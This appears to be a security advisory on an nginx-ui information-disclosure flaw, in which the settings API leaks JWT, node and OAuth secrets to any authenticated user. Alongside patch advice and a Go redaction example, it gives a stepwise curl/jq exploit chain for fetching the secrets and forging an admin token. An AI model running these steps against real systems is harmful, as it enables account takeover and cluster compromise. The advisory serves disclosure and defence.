The vulnerability exists in the `GetSettings` API handler (api/settings/settings.go:24-65). This endpoint serializes all settings structs to JSON and returns them to any authenticated user, regardless of privilege level. The developers intended to protect sensitive fields using a custom `protected:"true"` struct tag, but that tag is only enforced during write operations, via the `ProtectedFill` function in `SaveSettings` (lines 126-135). During read operations, `GetSettings` uses Go's `json.Marshal`, which ignores custom tags and serializes every exported field. As a result, over 40 protected fields are exposed, including `JwtSecret` (allows forging authentication tokens for any user), `NodeSecret` (used for cluster node impersonation), the OIDC `ClientSecret` (enables OAuth account takeover), Casdoor secrets, and the `IPWhiteList` configuration. An attacker with any valid JWT can send a GET request to `/api/settings` and receive a JSON response containing all of these secrets. The protection is asymmetric: secrets cannot be overwritten, but they are freely readable. Exploitation allows low-privilege users to escalate to full admin access, compromise the cluster, and bypass authentication.
DailyCVE form:
Platform: nginx-ui
Version: All versions
Vulnerability: Information disclosure
Severity: Critical
date: 2026-05-06
Prediction: 2026-05-20
What Undercode Say:
Count exposed protected fields across settings files:
grep -r 'protected:"true"' nginx-ui/settings/ | wc -l
Identify all JSON tags of protected fields:
grep -r 'protected:"true"' nginx-ui/settings/ -B1 | grep 'json:"'
Simulate the vulnerable API call (requires auth token):
curl -X GET http://target-nginx-ui/api/settings -H "Authorization: Bearer $JWT"
Filter response for JwtSecret:
curl -s http://target/api/settings -H "Authorization: Bearer $JWT" | jq '.app.jwt_secret'
Exploit:
Step 1: Authenticate as any low-privilege user
TOKEN=$(curl -s -X POST http://target/api/login -d '{"username":"user","password":"pass"}' | jq -r '.token')
Step 2: Fetch all settings including secrets
curl -s -X GET http://target/api/settings -H "Authorization: Bearer $TOKEN" > leaked_settings.json
Step 3: Extract NodeSecret for cluster impersonation
NODE_SECRET=$(jq -r '.node.secret' leaked_settings.json)
Step 4: Forge admin JWT using leaked jwt_secret
JWT_SECRET=$(jq -r '.app.jwt_secret' leaked_settings.json)
Use jwt_tool or python to create admin token with sub=admin
Protection from this CVE
- Apply patch that filters `protected:"true"` fields in `GetSettings` before JSON serialization (e.g., using reflection to skip those tags).
- If patch unavailable, block `/api/settings` endpoint for non-admin users via reverse proxy or RBAC.
- Rotate all secrets (`JwtSecret`, `NodeSecret`, OIDC client secrets) immediately after patching.
- Monitor logs for unauthorized access to `/api/settings`.
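The read-path fix the protection list asks for, as an added example rather than nginx-ui's own code: a reflection walk that drops every field tagged `protected:"true"` before handing the result to `json.Marshal`, so the read side enforces the same tag that `ProtectedFill` enforces on writes. The `AppSettings`/`NodeSettings`/`Settings` structs, their field names and the secret values are constructed for this example; only the tagging pattern and the `.app.jwt_secret` / `.node.secret` layout follow the advisory. The walk recurses into nested structs because settings are grouped into sections and a secret can sit at any depth.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"reflect"
	"strings"
)

// Hypothetical settings structs that follow the tagging pattern the advisory
// describes (a `protected:"true"` tag beside the json tag). Names, fields and
// values are constructed for this example, not taken from nginx-ui.
type AppSettings struct {
	PageSize  int    `json:"page_size"`
	JwtSecret string `json:"jwt_secret" protected:"true"`
}

type NodeSettings struct {
	Name   string `json:"name"`
	Secret string `json:"secret" protected:"true"`
}

type Settings struct {
	App  AppSettings  `json:"app"`
	Node NodeSettings `json:"node"`
}

// jsonKey returns the key encoding/json would use for a field: the json tag
// name if present (options such as ",omitempty" stripped), else the Go name.
// The second result is false for fields json itself skips (`json:"-"`).
func jsonKey(f reflect.StructField) (string, bool) {
	tag := f.Tag.Get("json")
	if idx := strings.IndexByte(tag, ','); idx >= 0 {
		tag = tag[:idx]
	}
	if tag == "-" {
		return "", false
	}
	if tag == "" {
		return f.Name, true
	}
	return tag, true
}

// Redact walks a struct (or pointer to struct) and returns a map holding every
// exported field except those tagged protected:"true". Nested structs are
// walked recursively so a secret in any settings section is dropped.
func Redact(v any) map[string]any {
	rv := reflect.ValueOf(v)
	for rv.Kind() == reflect.Ptr {
		if rv.IsNil() {
			return nil
		}
		rv = rv.Elem()
	}
	out := map[string]any{}
	if rv.Kind() != reflect.Struct {
		return out
	}
	rt := rv.Type()
	for i := 0; i < rt.NumField(); i++ {
		f := rt.Field(i)
		// Unexported fields are skipped by json anyway; protected ones must be
		// skipped here, because json.Marshal does not know the custom tag.
		if !f.IsExported() || f.Tag.Get("protected") == "true" {
			continue
		}
		key, ok := jsonKey(f)
		if !ok {
			continue
		}
		fv := rv.Field(i)
		isStruct := fv.Kind() == reflect.Struct
		isStructPtr := fv.Kind() == reflect.Ptr && fv.Elem().Kind() == reflect.Struct
		if isStruct || isStructPtr {
			out[key] = Redact(fv.Interface())
			continue
		}
		out[key] = fv.Interface()
	}
	return out
}

// MarshalRedacted is the read-path counterpart of a write-only ProtectedFill:
// it serializes a settings value with every protected field removed.
func MarshalRedacted(v any) ([]byte, error) {
	return json.Marshal(Redact(v))
}

// ContainsSecret is a cheap regression check for a response body: a
// serialized settings payload must never contain a known secret value.
func ContainsSecret(body []byte, secret string) bool {
	return bytes.Contains(body, []byte(secret))
}

func main() {
	s := Settings{
		App:  AppSettings{PageSize: 20, JwtSecret: "CONSTRUCTED-JWT-SECRET"},
		Node: NodeSettings{Name: "node-1", Secret: "CONSTRUCTED-NODE-SECRET"},
	}
	plain, _ := json.Marshal(s) // the vulnerable pattern: custom tag ignored
	safe, _ := MarshalRedacted(&s)
	fmt.Printf("json.Marshal leaks secret: %v\n%s\n", ContainsSecret(plain, s.App.JwtSecret), plain)
	fmt.Printf("redacted leaks secret:     %v\n%s\n", ContainsSecret(safe, s.App.JwtSecret), safe)
}
```

Running it prints the secret in the plain `json.Marshal` output and a response of `{"app":{"page_size":20},"node":{"name":"node-1"}}` from `MarshalRedacted`. The `ContainsSecret` check is the kind of assertion worth keeping in the handler's tests after patching: serialize the live settings, then assert that none of the configured secret values appear in the bytes that would go on the wire.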
Impact
- Authentication bypass: Forge valid JWT for any user (including admin) using leaked `JwtSecret` → permanent access.
- Cluster compromise: Impersonate any cluster node with `NodeSecret` → push malicious configs, intercept sync traffic.
- Third-party OAuth takeover: Leaked OIDC/Casdoor `ClientSecret` → perform OAuth flows as the app, compromise linked IdP accounts.
- Security config disclosure: `IPWhiteList`, reload commands, paths → enable targeted network and infrastructure attacks.
- Low barrier: Any authenticated user can exploit; multi-user deployments risk insider escalation to full admin.
Sources:
Reported By: github.com

